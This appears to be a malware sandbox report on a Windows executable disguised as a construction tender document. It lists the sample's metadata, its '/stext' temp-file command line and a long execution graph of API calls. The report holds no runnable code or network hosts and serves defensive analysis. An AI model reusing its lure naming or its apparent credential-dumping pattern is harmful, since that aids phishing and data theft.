                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        General

                                                                                                                        Target ID:7
                                                                                                                        Start time:10:18:53
                                                                                                                        Start date:16/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:808'698 bytes
                                                                                                                        MD5 hash:92E917F439CC408828A0629D80FDB043
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:20.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:14%
                                                                                                                          Signature Coverage:19.7%
                                                                                                                          Total number of Nodes:1510
                                                                                                                          Total number of Limit Nodes:45
                                                                                                                          execution_graph 4972 10001000 4975 1000101b 4972->4975 4982 10001516 4975->4982 4977 10001020 4978 10001024 4977->4978 4979 10001027 GlobalAlloc 4977->4979 4980 1000153d 3 API calls 4978->4980 4979->4978 4981 10001019 4980->4981 4984 1000151c 4982->4984 4983 10001522 4983->4977 4984->4983 4985 1000152e GlobalFree 4984->4985 4985->4977 4986 401d41 GetDC GetDeviceCaps 4987 402b1d 18 API calls 4986->4987 4988 401d5f MulDiv ReleaseDC 4987->4988 4989 402b1d 18 API calls 4988->4989 4990 401d7e 4989->4990 4991 405fae 18 API calls 4990->4991 4992 401db7 CreateFontIndirectW 4991->4992 4993 4024e8 4992->4993 4006 403cc2 4007 403e15 4006->4007 4008 403cda 4006->4008 4010 403e66 4007->4010 4011 403e26 GetDlgItem GetDlgItem 4007->4011 4008->4007 4009 403ce6 4008->4009 4012 403cf1 SetWindowPos 4009->4012 4013 403d04 4009->4013 4015 403ec0 4010->4015 4023 401389 2 API calls 4010->4023 4014 40419a 19 API calls 4011->4014 4012->4013 4017 403d21 4013->4017 4018 403d09 ShowWindow 4013->4018 4019 403e50 SetClassLongW 4014->4019 4036 403e10 4015->4036 4076 4041e6 4015->4076 4020 403d43 4017->4020 4021 403d29 DestroyWindow 4017->4021 4018->4017 4022 40140b 2 API calls 4019->4022 4024 403d48 SetWindowLongW 4020->4024 4025 403d59 4020->4025 4075 404123 4021->4075 4022->4010 4026 403e98 4023->4026 4024->4036 4029 403e02 4025->4029 4030 403d65 GetDlgItem 4025->4030 4026->4015 4031 403e9c SendMessageW 4026->4031 4027 40140b 2 API calls 4046 403ed2 4027->4046 4028 404125 DestroyWindow EndDialog 4028->4075 4095 404201 4029->4095 4034 403d95 4030->4034 4035 403d78 SendMessageW IsWindowEnabled 4030->4035 4031->4036 4033 404154 ShowWindow 4033->4036 4038 403da2 4034->4038 4039 403de9 SendMessageW 4034->4039 4040 403db5 4034->4040 4049 403d9a 4034->4049 4035->4034 4035->4036 4037 405fae 18 API calls 4037->4046 4038->4039 4038->4049 4039->4029 4043 403dd2 4040->4043 4044 403dbd 4040->4044 4042 40419a 19 API calls 4042->4046 4048 40140b 2 API calls 4043->4048 4089 40140b 4044->4089 4045 403dd0 4045->4029 4046->4027 4046->4028 4046->4036 4046->4037 4046->4042 4066 404065 DestroyWindow 4046->4066 4079 40419a 4046->4079 4050 403dd9 4048->4050 4092 404173 4049->4092 4050->4029 4050->4049 4052 403f4d GetDlgItem 4053 403f62 4052->4053 4054 403f6a ShowWindow KiUserCallbackDispatcher 4052->4054 4053->4054 4082 4041bc KiUserCallbackDispatcher 4054->4082 4056 403f94 EnableWindow 4059 403fa8 4056->4059 4057 403fad GetSystemMenu EnableMenuItem SendMessageW 4058 403fdd SendMessageW 4057->4058 4057->4059 4058->4059 4059->4057 4083 4041cf SendMessageW 4059->4083 4084 405f8c lstrcpynW 4059->4084 4062 40400b lstrlenW 4063 405fae 18 API calls 4062->4063 4064 404021 SetWindowTextW 4063->4064 4085 401389 4064->4085 4067 40407f CreateDialogParamW 4066->4067 4066->4075 4068 4040b2 4067->4068 4067->4075 4069 40419a 19 API calls 4068->4069 4070 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4069->4070 4071 401389 2 API calls 4070->4071 4072 404103 4071->4072 4072->4036 4073 40410b ShowWindow 4072->4073 4074 4041e6 SendMessageW 4073->4074 4074->4075 4075->4033 4075->4036 4077 4041fe 4076->4077 4078 4041ef SendMessageW 4076->4078 4077->4046 4078->4077 4080 405fae 18 API calls 4079->4080 4081 4041a5 SetDlgItemTextW 4080->4081 4081->4052 4082->4056 4083->4059 4084->4062 4087 401390 4085->4087 4086 4013fe 4086->4046 4087->4086 4088 4013cb MulDiv SendMessageW 4087->4088 4088->4087 4090 401389 2 API calls 4089->4090 4091 401420 4090->4091 4091->4049 4093 404180 SendMessageW 4092->4093 4094 40417a 4092->4094 4093->4045 4094->4093 4096 4042a2 4095->4096 4097 404219 GetWindowLongW 4095->4097 4096->4036 4097->4096 4098 40422a 4097->4098 4099 404239 GetSysColor 4098->4099 4100 40423c 4098->4100 4099->4100 4101 404242 SetTextColor 4100->4101 4102 40424c SetBkMode 4100->4102 4101->4102 4103 404264 GetSysColor 4102->4103 4104 40426a 4102->4104 4103->4104 4105 404271 SetBkColor 4104->4105 4106 40427b 4104->4106 4105->4106 4106->4096 4107 404295 CreateBrushIndirect 4106->4107 4108 40428e DeleteObject 4106->4108 4107->4096 4108->4107 4994 401a42 4995 402b1d 18 API calls 4994->4995 4996 401a48 4995->4996 4997 402b1d 18 API calls 4996->4997 4998 4019f0 4997->4998 5006 402746 5007 402741 5006->5007 5007->5006 5008 402756 FindNextFileW 5007->5008 5009 4027a8 5008->5009 5011 402761 5008->5011 5012 405f8c lstrcpynW 5009->5012 5012->5011 5013 401cc6 5014 402b1d 18 API calls 5013->5014 5015 401cd9 SetWindowLongW 5014->5015 5016 4029c7 5015->5016 4249 401dc7 4257 402b1d 4249->4257 4251 401dcd 4252 402b1d 18 API calls 4251->4252 4253 401dd6 4252->4253 4254 401de8 EnableWindow 4253->4254 4255 401ddd ShowWindow 4253->4255 4256 4029c7 4254->4256 4255->4256 4258 405fae 18 API calls 4257->4258 4259 402b31 4258->4259 4259->4251 5017 401bca 5018 402b1d 18 API calls 5017->5018 5019 401bd1 5018->5019 5020 402b1d 18 API calls 5019->5020 5021 401bdb 5020->5021 5022 402b3a 18 API calls 5021->5022 5026 401beb 5021->5026 5022->5026 5023 402b3a 18 API calls 5027 401bfb 5023->5027 5024 401c06 5028 402b1d 18 API calls 5024->5028 5025 401c4a 5029 402b3a 18 API calls 5025->5029 5026->5023 5026->5027 5027->5024 5027->5025 5030 401c0b 5028->5030 5031 401c4f 5029->5031 5032 402b1d 18 API calls 5030->5032 5033 402b3a 18 API calls 5031->5033 5035 401c14 5032->5035 5034 401c58 FindWindowExW 5033->5034 5038 401c7a 5034->5038 5036 401c3a SendMessageW 5035->5036 5037 401c1c SendMessageTimeoutW 5035->5037 5036->5038 5037->5038 5039 40194b 5040 402b1d 18 API calls 5039->5040 5041 401952 5040->5041 5042 402b1d 18 API calls 5041->5042 5043 40195c 5042->5043 5044 402b3a 18 API calls 5043->5044 5045 401965 5044->5045 5046 401979 lstrlenW 5045->5046 5048 4019b5 5045->5048 5047 401983 5046->5047 5047->5048 5052 405f8c lstrcpynW 5047->5052 5050 40199e 5050->5048 5051 4019ab lstrlenW 5050->5051 5051->5048 5052->5050 5056 4024cc 5057 402b3a 18 API calls 5056->5057 5058 4024d3 5057->5058 5061 405bf8 GetFileAttributesW CreateFileW 5058->5061 5060 4024df 5061->5060 5062 40164d 5063 402b3a 18 API calls 5062->5063 5064 401653 5063->5064 5065 4062cf 2 API calls 5064->5065 5066 401659 5065->5066 5067 4019cf 5068 402b3a 18 API calls 5067->5068 5069 4019d6 5068->5069 5070 402b3a 18 API calls 5069->5070 5071 4019df 5070->5071 5072 4019e6 lstrcmpiW 5071->5072 5073 4019f8 lstrcmpW 5071->5073 5074 4019ec 5072->5074 5073->5074 4281 401e51 4282 402b3a 18 API calls 4281->4282 4283 401e57 4282->4283 4284 405234 25 API calls 4283->4284 4285 401e61 4284->4285 4299 405703 CreateProcessW 4285->4299 4288 401ec6 CloseHandle 4291 402793 4288->4291 4289 401e77 WaitForSingleObject 4290 401e89 4289->4290 4292 401e9b GetExitCodeProcess 4290->4292 4302 40632f 4290->4302 4294 401eba 4292->4294 4295 401ead 4292->4295 4294->4288 4298 401eb8 4294->4298 4306 405ed3 wsprintfW 4295->4306 4298->4288 4300 401e67 4299->4300 4301 405736 CloseHandle 4299->4301 4300->4288 4300->4289 4300->4291 4301->4300 4303 40634c PeekMessageW 4302->4303 4304 406342 DispatchMessageW 4303->4304 4305 401e90 WaitForSingleObject 4303->4305 4304->4303 4305->4290 4306->4298 4381 401752 4382 402b3a 18 API calls 4381->4382 4383 401759 4382->4383 4384 401781 4383->4384 4385 401779 4383->4385 4421 405f8c lstrcpynW 4384->4421 4420 405f8c lstrcpynW 4385->4420 4388 40177f 4392 406220 5 API calls 4388->4392 4389 40178c 4390 4059d7 3 API calls 4389->4390 4391 401792 lstrcatW 4390->4391 4391->4388 4409 40179e 4392->4409 4393 4062cf 2 API calls 4393->4409 4394 405bd3 2 API calls 4394->4409 4396 4017b0 CompareFileTime 4396->4409 4397 401870 4399 405234 25 API calls 4397->4399 4398 401847 4400 405234 25 API calls 4398->4400 4418 40185c 4398->4418 4402 40187a 4399->4402 4400->4418 4401 405f8c lstrcpynW 4401->4409 4403 403062 46 API calls 4402->4403 4404 40188d 4403->4404 4405 4018a1 SetFileTime 4404->4405 4406 4018b3 CloseHandle 4404->4406 4405->4406 4408 4018c4 4406->4408 4406->4418 4407 405fae 18 API calls 4407->4409 4410 4018c9 4408->4410 4411 4018dc 4408->4411 4409->4393 4409->4394 4409->4396 4409->4397 4409->4398 4409->4401 4409->4407 4419 405bf8 GetFileAttributesW CreateFileW 4409->4419 4422 405768 4409->4422 4412 405fae 18 API calls 4410->4412 4413 405fae 18 API calls 4411->4413 4415 4018d1 lstrcatW 4412->4415 4416 4018e4 4413->4416 4415->4416 4417 405768 MessageBoxIndirectW 4416->4417 4417->4418 4419->4409 4420->4388 4421->4389 4423 40577d 4422->4423 4424 4057c9 4423->4424 4425 405791 MessageBoxIndirectW 4423->4425 4424->4409 4425->4424 4426 402253 4427 402261 4426->4427 4428 40225b 4426->4428 4430 402b3a 18 API calls 4427->4430 4431 40226f 4427->4431 4429 402b3a 18 API calls 4428->4429 4429->4427 4430->4431 4432 40227d 4431->4432 4434 402b3a 18 API calls 4431->4434 4433 402b3a 18 API calls 4432->4433 4435 402286 WritePrivateProfileStringW 4433->4435 4434->4432 5075 402454 5076 402c44 19 API calls 5075->5076 5077 40245e 5076->5077 5078 402b1d 18 API calls 5077->5078 5079 402467 5078->5079 5080 40248b RegEnumValueW 5079->5080 5081 40247f RegEnumKeyW 5079->5081 5082 402793 5079->5082 5080->5082 5083 4024a4 RegCloseKey 5080->5083 5081->5083 5083->5082 5085 401ed4 5086 402b3a 18 API calls 5085->5086 5087 401edb 5086->5087 5088 4062cf 2 API calls 5087->5088 5089 401ee1 5088->5089 5091 401ef2 5089->5091 5092 405ed3 wsprintfW 5089->5092 5092->5091 4505 4022d5 4506 402305 4505->4506 4507 4022da 4505->4507 4508 402b3a 18 API calls 4506->4508 4509 402c44 19 API calls 4507->4509 4510 40230c 4508->4510 4511 4022e1 4509->4511 4517 402b7a RegOpenKeyExW 4510->4517 4512 4022eb 4511->4512 4516 402322 4511->4516 4513 402b3a 18 API calls 4512->4513 4515 4022f2 RegDeleteValueW RegCloseKey 4513->4515 4515->4516 4518 402c0e 4517->4518 4520 402ba5 4517->4520 4518->4516 4519 402bcb RegEnumKeyW 4519->4520 4521 402bdd RegCloseKey 4519->4521 4520->4519 4520->4521 4523 402c02 RegCloseKey 4520->4523 4526 402b7a 3 API calls 4520->4526 4522 4062f6 3 API calls 4521->4522 4524 402bed 4522->4524 4525 402bf1 4523->4525 4524->4525 4527 402c1d RegDeleteKeyW 4524->4527 4525->4518 4526->4520 4527->4525 4535 4014d7 4536 402b1d 18 API calls 4535->4536 4537 4014dd Sleep 4536->4537 4539 4029c7 4537->4539 4754 40335a #17 SetErrorMode OleInitialize 4755 4062f6 3 API calls 4754->4755 4756 40339d SHGetFileInfoW 4755->4756 4829 405f8c lstrcpynW 4756->4829 4758 4033c8 GetCommandLineW 4830 405f8c lstrcpynW 4758->4830 4760 4033da GetModuleHandleW 4761 4033f4 4760->4761 4762 405a04 CharNextW 4761->4762 4763 403402 CharNextW 4762->4763 4771 403414 4763->4771 4764 403516 4765 40352a GetTempPathW 4764->4765 4831 403326 4765->4831 4767 403542 4768 403546 GetWindowsDirectoryW lstrcatW 4767->4768 4769 40359c DeleteFileW 4767->4769 4772 403326 11 API calls 4768->4772 4839 402dbc GetTickCount GetModuleFileNameW 4769->4839 4770 405a04 CharNextW 4770->4771 4771->4764 4771->4770 4777 403518 4771->4777 4774 403562 4772->4774 4774->4769 4776 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4774->4776 4775 4035b0 4778 403663 4775->4778 4782 403653 4775->4782 4786 405a04 CharNextW 4775->4786 4781 403326 11 API calls 4776->4781 4923 405f8c lstrcpynW 4777->4923 4926 40382d 4778->4926 4785 403594 4781->4785 4869 40391f 4782->4869 4785->4769 4785->4778 4797 4035cf 4786->4797 4787 403772 4789 403815 ExitProcess 4787->4789 4791 4062f6 3 API calls 4787->4791 4788 40367c 4790 405768 MessageBoxIndirectW 4788->4790 4794 40368a ExitProcess 4790->4794 4796 403785 4791->4796 4792 403692 lstrcatW lstrcmpiW 4792->4778 4799 4036ae CreateDirectoryW SetCurrentDirectoryW 4792->4799 4793 40362d 4798 405adf 18 API calls 4793->4798 4800 4062f6 3 API calls 4796->4800 4797->4792 4797->4793 4801 403639 4798->4801 4802 4036d1 4799->4802 4803 4036c6 4799->4803 4804 40378e 4800->4804 4801->4778 4924 405f8c lstrcpynW 4801->4924 4936 405f8c lstrcpynW 4802->4936 4935 405f8c lstrcpynW 4803->4935 4807 4062f6 3 API calls 4804->4807 4809 403797 4807->4809 4812 4037b5 4809->4812 4818 4037a5 GetCurrentProcess 4809->4818 4810 403648 4925 405f8c lstrcpynW 4810->4925 4811 405fae 18 API calls 4814 403710 DeleteFileW 4811->4814 4815 4062f6 3 API calls 4812->4815 4816 40371d CopyFileW 4814->4816 4826 4036df 4814->4826 4817 4037ec 4815->4817 4816->4826 4819 403801 ExitWindowsEx 4817->4819 4822 40380e 4817->4822 4818->4812 4819->4789 4819->4822 4820 403766 4823 405e26 40 API calls 4820->4823 4821 405e26 40 API calls 4821->4826 4824 40140b 2 API calls 4822->4824 4823->4778 4824->4789 4825 405fae 18 API calls 4825->4826 4826->4811 4826->4820 4826->4821 4826->4825 4827 405703 2 API calls 4826->4827 4828 403751 CloseHandle 4826->4828 4827->4826 4828->4826 4829->4758 4830->4760 4832 406220 5 API calls 4831->4832 4834 403332 4832->4834 4833 40333c 4833->4767 4834->4833 4835 4059d7 3 API calls 4834->4835 4836 403344 CreateDirectoryW 4835->4836 4937 405c27 4836->4937 4941 405bf8 GetFileAttributesW CreateFileW 4839->4941 4841 402dff 4868 402e0c 4841->4868 4942 405f8c lstrcpynW 4841->4942 4843 402e22 4844 405a23 2 API calls 4843->4844 4845 402e28 4844->4845 4943 405f8c lstrcpynW 4845->4943 4847 402e33 GetFileSize 4848 402f34 4847->4848 4866 402e4a 4847->4866 4849 402d1a 33 API calls 4848->4849 4850 402f3b 4849->4850 4852 402f77 GlobalAlloc 4850->4852 4850->4868 4945 40330f SetFilePointer 4850->4945 4851 4032f9 ReadFile 4851->4866 4856 402f8e 4852->4856 4853 402fcf 4854 402d1a 33 API calls 4853->4854 4854->4868 4858 405c27 2 API calls 4856->4858 4857 402f58 4859 4032f9 ReadFile 4857->4859 4861 402f9f CreateFileW 4858->4861 4862 402f63 4859->4862 4860 402d1a 33 API calls 4860->4866 4863 402fd9 4861->4863 4861->4868 4862->4852 4862->4868 4944 40330f SetFilePointer 4863->4944 4865 402fe7 4867 403062 46 API calls 4865->4867 4866->4848 4866->4851 4866->4853 4866->4860 4866->4868 4867->4868 4868->4775 4870 4062f6 3 API calls 4869->4870 4871 403933 4870->4871 4872 403939 4871->4872 4873 40394b 4871->4873 4955 405ed3 wsprintfW 4872->4955 4874 405e59 3 API calls 4873->4874 4875 40397b 4874->4875 4877 40399a lstrcatW 4875->4877 4879 405e59 3 API calls 4875->4879 4878 403949 4877->4878 4946 403bf5 4878->4946 4879->4877 4882 405adf 18 API calls 4883 4039cc 4882->4883 4884 403a60 4883->4884 4886 405e59 3 API calls 4883->4886 4885 405adf 18 API calls 4884->4885 4887 403a66 4885->4887 4888 4039fe 4886->4888 4889 403a76 LoadImageW 4887->4889 4890 405fae 18 API calls 4887->4890 4888->4884 4893 403a1f lstrlenW 4888->4893 4897 405a04 CharNextW 4888->4897 4891 403b1c 4889->4891 4892 403a9d RegisterClassW 4889->4892 4890->4889 4895 40140b 2 API calls 4891->4895 4894 403ad3 SystemParametersInfoW CreateWindowExW 4892->4894 4922 403b26 4892->4922 4898 403a53 4893->4898 4899 403a2d lstrcmpiW 4893->4899 4894->4891 4896 403b22 4895->4896 4903 403bf5 19 API calls 4896->4903 4896->4922 4901 403a1c 4897->4901 4900 4059d7 3 API calls 4898->4900 4899->4898 4902 403a3d GetFileAttributesW 4899->4902 4904 403a59 4900->4904 4901->4893 4905 403a49 4902->4905 4907 403b33 4903->4907 4956 405f8c lstrcpynW 4904->4956 4905->4898 4906 405a23 2 API calls 4905->4906 4906->4898 4909 403bc2 4907->4909 4910 403b3f ShowWindow LoadLibraryW 4907->4910 4913 405307 5 API calls 4909->4913 4911 403b65 GetClassInfoW 4910->4911 4912 403b5e LoadLibraryW 4910->4912 4915 403b79 GetClassInfoW RegisterClassW 4911->4915 4916 403b8f DialogBoxParamW 4911->4916 4912->4911 4914 403bc8 4913->4914 4917 403be4 4914->4917 4918 403bcc 4914->4918 4915->4916 4919 40140b 2 API calls 4916->4919 4920 40140b 2 API calls 4917->4920 4921 40140b 2 API calls 4918->4921 4918->4922 4919->4922 4920->4922 4921->4922 4922->4778 4923->4765 4924->4810 4925->4782 4927 403848 4926->4927 4928 40383e CloseHandle 4926->4928 4929 403852 CloseHandle 4927->4929 4930 40385c 4927->4930 4928->4927 4929->4930 4958 40388a 4930->4958 4933 405814 71 API calls 4934 40366c OleUninitialize 4933->4934 4934->4787 4934->4788 4935->4802 4936->4826 4938 405c34 GetTickCount GetTempFileNameW 4937->4938 4939 403358 4938->4939 4940 405c6a 4938->4940 4939->4767 4940->4938 4940->4939 4941->4841 4942->4843 4943->4847 4944->4865 4945->4857 4947 403c09 4946->4947 4957 405ed3 wsprintfW 4947->4957 4949 403c7a 4950 405fae 18 API calls 4949->4950 4951 403c86 SetWindowTextW 4950->4951 4952 403ca2 4951->4952 4953 4039aa 4951->4953 4952->4953 4954 405fae 18 API calls 4952->4954 4953->4882 4954->4952 4955->4878 4956->4884 4957->4949 4959 403898 4958->4959 4960 40389d FreeLibrary GlobalFree 4959->4960 4961 403861 4959->4961 4960->4960 4960->4961 4961->4933 5100 40155b 5101 40296d 5100->5101 5104 405ed3 wsprintfW 5101->5104 5103 402972 5104->5103 5105 4038dd 5106 4038e8 5105->5106 5107 4038ec 5106->5107 5108 4038ef GlobalAlloc 5106->5108 5108->5107 5109 40165e 5110 402b3a 18 API calls 5109->5110 5111 401665 5110->5111 5112 402b3a 18 API calls 5111->5112 5113 40166e 5112->5113 5114 402b3a 18 API calls 5113->5114 5115 401677 MoveFileW 5114->5115 5116 401683 5115->5116 5117 40168a 5115->5117 5118 401423 25 API calls 5116->5118 5119 4062cf 2 API calls 5117->5119 5121 402197 5117->5121 5118->5121 5120 401699 5119->5120 5120->5121 5122 405e26 40 API calls 5120->5122 5122->5116 3945 4023e0 3956 402c44 3945->3956 3947 4023ea 3960 402b3a 3947->3960 3950 4023fe RegQueryValueExW 3952 402424 RegCloseKey 3950->3952 3953 40241e 3950->3953 3951 402793 3952->3951 3953->3952 3966 405ed3 wsprintfW 3953->3966 3957 402b3a 18 API calls 3956->3957 3958 402c5d 3957->3958 3959 402c6b RegOpenKeyExW 3958->3959 3959->3947 3961 402b46 3960->3961 3967 405fae 3961->3967 3964 4023f3 3964->3950 3964->3951 3966->3952 3979 405fbb 3967->3979 3968 406206 3969 402b67 3968->3969 4001 405f8c lstrcpynW 3968->4001 3969->3964 3985 406220 3969->3985 3971 40606e GetVersion 3971->3979 3972 4061d4 lstrlenW 3972->3979 3973 405fae 10 API calls 3973->3972 3976 4060e9 GetSystemDirectoryW 3976->3979 3978 4060fc GetWindowsDirectoryW 3978->3979 3979->3968 3979->3971 3979->3972 3979->3973 3979->3976 3979->3978 3980 406220 5 API calls 3979->3980 3981 405fae 10 API calls 3979->3981 3982 406175 lstrcatW 3979->3982 3983 406130 SHGetSpecialFolderLocation 3979->3983 3994 405e59 RegOpenKeyExW 3979->3994 3999 405ed3 wsprintfW 3979->3999 4000 405f8c lstrcpynW 3979->4000 3980->3979 3981->3979 3982->3979 3983->3979 3984 406148 SHGetPathFromIDListW CoTaskMemFree 3983->3984 3984->3979 3992 40622d 3985->3992 3986 4062a3 3987 4062a8 CharPrevW 3986->3987 3990 4062c9 3986->3990 3987->3986 3988 406296 CharNextW 3988->3986 3988->3992 3990->3964 3991 406282 CharNextW 3991->3992 3992->3986 3992->3988 3992->3991 3993 406291 CharNextW 3992->3993 4002 405a04 3992->4002 3993->3988 3995 405ecd 3994->3995 3996 405e8d RegQueryValueExW 3994->3996 3995->3979 3997 405eae RegCloseKey 3996->3997 3997->3995 3999->3979 4000->3979 4001->3969 4003 405a0a 4002->4003 4004 405a20 4003->4004 4005 405a11 CharNextW 4003->4005 4004->3992 4005->4003 5123 4065e1 5129 406465 5123->5129 5124 406dd0 5125 4064e6 GlobalFree 5126 4064ef GlobalAlloc 5125->5126 5126->5124 5126->5129 5127 406566 GlobalAlloc 5127->5124 5127->5129 5128 40655d GlobalFree 5128->5127 5129->5124 5129->5125 5129->5126 5129->5127 5129->5128 5130 401ce5 GetDlgItem GetClientRect 5131 402b3a 18 API calls 5130->5131 5132 401d17 LoadImageW SendMessageW 5131->5132 5133 401d35 DeleteObject 5132->5133 5134 4029c7 5132->5134 5133->5134 5135 4027e5 5155 405bf8 GetFileAttributesW CreateFileW 5135->5155 5137 4027ec 5138 402895 5137->5138 5139 4027f8 GlobalAlloc 5137->5139 5142 4028b0 5138->5142 5143 40289d DeleteFileW 5138->5143 5140 402811 5139->5140 5141 40288c CloseHandle 5139->5141 5156 40330f SetFilePointer 5140->5156 5141->5138 5143->5142 5145 402817 5146 4032f9 ReadFile 5145->5146 5147 402820 GlobalAlloc 5146->5147 5148 402830 5147->5148 5149 402864 WriteFile GlobalFree 5147->5149 5151 403062 46 API calls 5148->5151 5150 403062 46 API calls 5149->5150 5152 402889 5150->5152 5154 40283d 5151->5154 5152->5141 5153 40285b GlobalFree 5153->5149 5154->5153 5155->5137 5156->5145 5157 4042e8 lstrlenW 5158 404307 5157->5158 5159 404309 WideCharToMultiByte 5157->5159 5158->5159 5160 100018a9 5162 100018cc 5160->5162 5161 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5164 10001272 2 API calls 5161->5164 5162->5161 5163 100018ff GlobalFree 5162->5163 5163->5161 5165 10001a87 GlobalFree GlobalFree 5164->5165 5166 40206a 5167 402b3a 18 API calls 5166->5167 5168 402071 5167->5168 5169 402b3a 18 API calls 5168->5169 5170 40207b 5169->5170 5171 402b3a 18 API calls 5170->5171 5172 402084 5171->5172 5173 402b3a 18 API calls 5172->5173 5174 40208e 5173->5174 5175 402b3a 18 API calls 5174->5175 5176 402098 5175->5176 5177 4020ac CoCreateInstance 5176->5177 5178 402b3a 18 API calls 5176->5178 5179 4020cb 5177->5179 5178->5177 5180 401423 25 API calls 5179->5180 5181 402197 5179->5181 5180->5181 4263 40156b 4264 401584 4263->4264 4265 40157b ShowWindow 4263->4265 4266 401592 ShowWindow 4264->4266 4267 4029c7 4264->4267 4265->4264 4266->4267 4268 4024ee 4269 4024f3 4268->4269 4270 40250c 4268->4270 4271 402b1d 18 API calls 4269->4271 4272 402512 4270->4272 4273 40253e 4270->4273 4274 4024fa 4271->4274 4275 402b3a 18 API calls 4272->4275 4276 402b3a 18 API calls 4273->4276 4279 402793 4274->4279 4280 402567 WriteFile 4274->4280 4277 402519 WideCharToMultiByte lstrlenA 4275->4277 4278 402545 lstrlenW 4276->4278 4277->4274 4278->4274 4280->4279 5189 4045ee 5190 404624 5189->5190 5191 4045fe 5189->5191 5193 404201 8 API calls 5190->5193 5192 40419a 19 API calls 5191->5192 5194 40460b SetDlgItemTextW 5192->5194 5195 404630 5193->5195 5194->5190 5196 4018ef 5197 401926 5196->5197 5198 402b3a 18 API calls 5197->5198 5199 40192b 5198->5199 5200 405814 71 API calls 5199->5200 5201 401934 5200->5201 5202 402770 5203 402b3a 18 API calls 5202->5203 5204 402777 FindFirstFileW 5203->5204 5205 40279f 5204->5205 5208 40278a 5204->5208 5206 4027a8 5205->5206 5210 405ed3 wsprintfW 5205->5210 5211 405f8c lstrcpynW 5206->5211 5210->5206 5211->5208 5212 4014f1 SetForegroundWindow 5213 4029c7 5212->5213 5214 4018f2 5215 402b3a 18 API calls 5214->5215 5216 4018f9 5215->5216 5217 405768 MessageBoxIndirectW 5216->5217 5218 401902 5217->5218 4436 405373 4437 405394 GetDlgItem GetDlgItem GetDlgItem 4436->4437 4438 40551d 4436->4438 4482 4041cf SendMessageW 4437->4482 4439 405526 GetDlgItem CreateThread CloseHandle 4438->4439 4440 40554e 4438->4440 4439->4440 4485 405307 OleInitialize 4439->4485 4443 405579 4440->4443 4444 405565 ShowWindow ShowWindow 4440->4444 4445 40559e 4440->4445 4442 405404 4448 40540b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4442->4448 4446 405585 4443->4446 4447 4055d9 4443->4447 4484 4041cf SendMessageW 4444->4484 4452 404201 8 API calls 4445->4452 4450 4055b3 ShowWindow 4446->4450 4451 40558d 4446->4451 4447->4445 4455 4055e7 SendMessageW 4447->4455 4453 405479 4448->4453 4454 40545d SendMessageW SendMessageW 4448->4454 4458 4055d3 4450->4458 4459 4055c5 4450->4459 4456 404173 SendMessageW 4451->4456 4457 4055ac 4452->4457 4461 40548c 4453->4461 4462 40547e SendMessageW 4453->4462 4454->4453 4455->4457 4463 405600 CreatePopupMenu 4455->4463 4456->4445 4460 404173 SendMessageW 4458->4460 4464 405234 25 API calls 4459->4464 4460->4447 4466 40419a 19 API calls 4461->4466 4462->4461 4465 405fae 18 API calls 4463->4465 4464->4458 4467 405610 AppendMenuW 4465->4467 4468 40549c 4466->4468 4469 405640 TrackPopupMenu 4467->4469 4470 40562d GetWindowRect 4467->4470 4471 4054a5 ShowWindow 4468->4471 4472 4054d9 GetDlgItem SendMessageW 4468->4472 4469->4457 4473 40565b 4469->4473 4470->4469 4474 4054c8 4471->4474 4475 4054bb ShowWindow 4471->4475 4472->4457 4476 405500 SendMessageW SendMessageW 4472->4476 4477 405677 SendMessageW 4473->4477 4483 4041cf SendMessageW 4474->4483 4475->4474 4476->4457 4477->4477 4478 405694 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4477->4478 4480 4056b9 SendMessageW 4478->4480 4480->4480 4481 4056e2 GlobalUnlock SetClipboardData CloseClipboard 4480->4481 4481->4457 4482->4442 4483->4472 4484->4443 4486 4041e6 SendMessageW 4485->4486 4487 40532a 4486->4487 4490 401389 2 API calls 4487->4490 4491 405351 4487->4491 4488 4041e6 SendMessageW 4489 405363 OleUninitialize 4488->4489 4490->4487 4491->4488 4492 402573 4493 402b1d 18 API calls 4492->4493 4495 402582 4493->4495 4494 4026a0 4495->4494 4496 4025c8 ReadFile 4495->4496 4497 405c7b ReadFile 4495->4497 4498 4026a2 4495->4498 4499 402608 MultiByteToWideChar 4495->4499 4501 40262e SetFilePointer MultiByteToWideChar 4495->4501 4502 4026b3 4495->4502 4496->4494 4496->4495 4497->4495 4504 405ed3 wsprintfW 4498->4504 4499->4495 4501->4495 4502->4494 4503 4026d4 SetFilePointer 4502->4503 4503->4494 4504->4494 5219 401df3 5220 402b3a 18 API calls 5219->5220 5221 401df9 5220->5221 5222 402b3a 18 API calls 5221->5222 5223 401e02 5222->5223 5224 402b3a 18 API calls 5223->5224 5225 401e0b 5224->5225 5226 402b3a 18 API calls 5225->5226 5227 401e14 5226->5227 5228 401423 25 API calls 5227->5228 5229 401e1b ShellExecuteW 5228->5229 5230 401e4c 5229->5230 5236 100016b6 5237 100016e5 5236->5237 5238 10001b18 22 API calls 5237->5238 5239 100016ec 5238->5239 5240 100016f3 5239->5240 5241 100016ff 5239->5241 5242 10001272 2 API calls 5240->5242 5243 10001726 5241->5243 5244 10001709 5241->5244 5253 100016fd 5242->5253 5245 10001750 5243->5245 5246 1000172c 5243->5246 5247 1000153d 3 API calls 5244->5247 5250 1000153d 3 API 